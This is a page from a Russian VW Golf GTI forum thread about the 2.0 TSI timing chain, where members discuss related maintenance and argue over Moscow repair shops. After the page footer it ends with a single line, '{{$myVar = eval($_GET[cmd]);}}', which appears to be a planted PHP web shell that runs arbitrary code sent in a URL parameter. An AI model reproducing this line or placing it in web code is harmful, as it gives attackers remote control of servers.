+ Ответить в теме
Страница 30 из 33 ПерваяПервая ... 20 28 29 30 31 32 ... ПоследняяПоследняя
Показано с 291 по 300 из 329

Тема: цепь 2.0 TSI


  1. #291
    Мимо проходил Fastoff is on a distinguished road Аватар для Fastoff
    Регистрация
    08.04.2016
    Откуда
    Moscow
    Машина
    GTI MK6 DSG 2012
    Сообщений
    54
    Да, отлично.

    ---------- Сообщение добавлено в 01:30 ---------- Предыдущее сообщение размещено в 01:18 ----------

    Как в 0-то попали?))))

  2. #292
    GTI-Racing SLeSar is on a distinguished road Аватар для SLeSar
    Регистрация
    05.10.2011
    Откуда
    нерезиновая
    Машина
    Golf-GTI Adidas 2.0 dsg(211л.с.) | Opel mokka 1.8 AT (160л.с.) | audi Q3 2.0t (200+л.с.)
    Сообщений
    34
    Цитата Сообщение от Rugby 14 Посмотреть сообщение
    про whynotservice слышал плохие отзывы (переделывали за ними. причем много), про гти гараж в целом хорошо. про битюн и вагрт ниче не могу сказать - не был там.
    А можно по подробнее про whynotservice ? мне щя там машину восстанавливают.... какие подводные камни могут быть?

  3. #293
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    Цитата Сообщение от SLeSar Посмотреть сообщение
    А можно по подробнее про whynotservice ? мне щя там машину восстанавливают.... какие подводные камни могут быть?
    на гти мк5 товарища перебирали там дсг и что-то делали по мотору (честно не могу вспомнить что). в итоге положили и мотор и коробку ((
    Tough Guys Don`t Dance ©

    .:Revo St.2+

  4. #294
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    Кирил либо плохо о людях либо ни как коле ты правды не говоришь... а так вокруг да около
    Выглядит высер просто а было где то как то кем то но не помню когда и зачем! Но помню, что кто то, что как то, где то, а вот там на горе когда рак свиснул, А точно это же они! Бред не неси! Либо конкретно, или ты уверен что ты говоришь про вайнот? И при чем тут вайнот когда тебя спросили про других? Или обосрать все что связано с overload дело чести мужика и языком трепать на лево и на право теперь?
    Почему они себя так не ведут?
    Просто не красиво так вести себя!


    ---------- Сообщение добавлено в 22:50 ---------- Предыдущее сообщение размещено в 22:47 ----------

    Цитата Сообщение от SLeSar Посмотреть сообщение
    А можно по подробнее про whynotservice ? мне щя там машину восстанавливают.... какие подводные камни могут быть?
    Да ни каких не может быть...

    Он сам там никогда не был! А поливает
    ...
    Все ок будет. Восстановили ребята не один 10ток авто там после разных чип/сервис контор иди же просто изза раздолбайства бывших владельцев и все довольны!
    Последний раз редактировалось MSK; 17.05.2016 в 00:11. Причина: Ошибочки поправил :)
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

  5. #295
    Мимо проходил Fastoff is on a distinguished road Аватар для Fastoff
    Регистрация
    08.04.2016
    Откуда
    Moscow
    Машина
    GTI MK6 DSG 2012
    Сообщений
    54
    А что касается совмещения работ при замене цепи? Может заодно поменять приводной ремень, ролик натяжителя ремня, подшипник компрессора кондея (который гудит у всех поголовно)?

  6. #296
    GTI-Racing Korney is on a distinguished road Аватар для Korney
    Регистрация
    04.06.2014
    Откуда
    СВАО
    Машина
    R32 mk V
    Сообщений
    343
    Цитата Сообщение от MSK Посмотреть сообщение
    Кирил либо плохо о людях либо ни как коле ты правды не говоришь... а так вокруг да около
    Выглядит высер просто а было где то как то кем то но не помню когда и зачем! Но помню, что кто то, что как то, где то, а вот там на горе когда рак свиснул, А точно это же они! Бред не неси! Либо конкретно, или ты уверен что ты говоришь про вайнот? И при чем тут вайнот когда тебя спросили про других? Или обосрать все что связано с overload дело чести мужика и языком трепать на лево и на право теперь?
    Почему они себя так не ведут?
    Просто не красиво так вести себя!


    ---------- Сообщение добавлено в 22:50 ---------- Предыдущее сообщение размещено в 22:47 ----------



    Да ни каких не может быть...

    Он сам там никогда не был! А поливает
    ...
    Все ок будет. Восстановили ребята не один 10ток авто там после разных чип/сервис контор иди же просто изза раздолбайства бывших владельцев и все довольны!
    Коль вот не надо, косяки есть, и на все мои вопросы ни Саша ни Олег не отреагировали даже.

    Помнишь как машина два раза возвращались на эвакуатора после замены масла?
    А как тебе ТНВД на двух шпильках после замены колпачка? И я даже допускаю что он был сорван до ребят, но промолчатьь об этом - просто вышак
    Boost is like a blowjob

  7. #297
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    При чем тут косяки?? Паша я про мотор написал и слова кирила что он в других местах не был а тут пишет. Ты куппил полу трупа и хотел чтоб он сразу ожил на ровном месте! Паш ну блин я знаю от тебя все по машине но в тоже время твоя была присмерти и ее оживили все же.
    У тебя все в авто сломано по сути и что то шло не так. ... нельзя взять ушат и за два приезда в сервис оживить его.
    Ну ты просто ахтунг
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

  8. #298
    GTI-Racing Korney is on a distinguished road Аватар для Korney
    Регистрация
    04.06.2014
    Откуда
    СВАО
    Машина
    R32 mk V
    Сообщений
    343
    Цитата Сообщение от MSK Посмотреть сообщение
    При чем тут косяки?? Паша я про мотор написал и слова кирила что он в других местах не был а тут пишет. Ты куппил полу трупа и хотел чтоб он сразу ожил на ровном месте! Паш ну блин я знаю от тебя все по машине но в тоже время твоя была присмерти и ее оживили все же.
    У тебя все в авто сломано по сути и что то шло не так. ... нельзя взять ушат и за два приезда в сервис оживить его.
    Ну ты просто ахтунг
    Так я и написал про два конкретных примера:-) При чем тут общее состояние?
    Boost is like a blowjob

  9. #299
    Мимо проходил Fastoff is on a distinguished road Аватар для Fastoff
    Регистрация
    08.04.2016
    Откуда
    Moscow
    Машина
    GTI MK6 DSG 2012
    Сообщений
    54
    Ребят, давайте тему не засерать. Выяснить отношения можно в личке.

  10. #300
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    Цитата Сообщение от MSK Посмотреть сообщение
    Кирил либо плохо о людях либо ни как коле ты правды не говоришь... а так вокруг да около
    Выглядит высер просто а было где то как то кем то но не помню когда и зачем! Но помню, что кто то, что как то, где то, а вот там на горе когда рак свиснул, А точно это же они! Бред не неси! Либо конкретно, или ты уверен что ты говоришь про вайнот? И при чем тут вайнот когда тебя спросили про других? Или обосрать все что связано с overload дело чести мужика и языком трепать на лево и на право теперь?
    Почему они себя так не ведут?
    Просто не красиво так вести себя!


    ---------- Сообщение добавлено в 22:50 ---------- Предыдущее сообщение размещено в 22:47 ----------



    Да ни каких не может быть...

    Он сам там никогда не был! А поливает
    ...
    Все ок будет. Восстановили ребята не один 10ток авто там после разных чип/сервис контор иди же просто изза раздолбайства бывших владельцев и все довольны!
    эк тебя бомбануло, Николай... правда глаза режет что ли?
    Во-первых, моё имя пишется с двумя Л. Я очень ранимый человек и меня это дико задевает. Примерно так же, как если бы тебя называли Каля.
    Во-вторых, я лично(!) знаю "пострадавшего", лично(!) с ним говорил по этому поводу и лично готов отвечать за свои слова. Собственно, если я в чем-то не уверен, то я так и пишу. Если тебе свойственно просто так сотрясать воздух, то не надо эту черту перекладывать на всех остальных. Если бы ты внимательно читал, то увидел бы, что спрашивали про сервисы в целом, а далее спросили что не так конкретно с вайнотом.
    В-третьих, при чем тут оверлоад мне вообще непонятно. Мы вроде говорим про сервисы, а ты притягиваешь сюда настройщиков. Душевная рана не дает тебе покоя, что мне не понравились эксперименты над моей машиной и я ушел в др контору (которую я не рекламирую, между прочим, в отличие от тебя)?
    В-четвертых, кто они и как себя ведут я не в курсе, а как вести себя разберусь без чужой помощи, благо воспитали меня хорошо. Грязью никогда никого не поливал, а говорю по факту! Если тебе эти факты неприятны, то это не моя забота.

    Ну и на последок, не вижу никакой проблемы в том, чтобы за ДВА приезда восстановить ушат. Но это уже другая тема.
    Забавно, конечно, как ты съезжаешь с темы, когда тебе и другие тычат фактами...

    UPD по теме:
    вспомнил, что раньше в b-tune был хороший мастер Леша. Но щас хз работает там или нет.
    Tough Guys Don`t Dance ©

    .:Revo St.2+

+ Ответить в теме
Страница 30 из 33 ПерваяПервая ... 20 28 29 30 31 32 ... ПоследняяПоследняя

Похожие темы

  1. Цепь на golf 6 gti tfsi?
    от bubliq в разделе Golf 6
    Ответов: 42
    Последнее сообщение: 03.01.2024, 22:40
  2. Цепь или ремень на 2.0 TSI
    от Bibski в разделе Golf 5
    Ответов: 37
    Последнее сообщение: 02.01.2024, 09:36
  3. Цепь привода ГРM
    от 4zi в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 21.10.2014, 13:17
  4. Продам ТНВД, толкатель , цепь (НОВОЕ) от GTI V
    от brogarage в разделе Покупка и продажа запчастей
    Ответов: 2
    Последнее сообщение: 24.09.2014, 09:40
  5. Продам впускной вал + цепь
    от NEVO в разделе Покупка и продажа запчастей
    Ответов: 2
    Последнее сообщение: 21.11.2012, 14:08

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}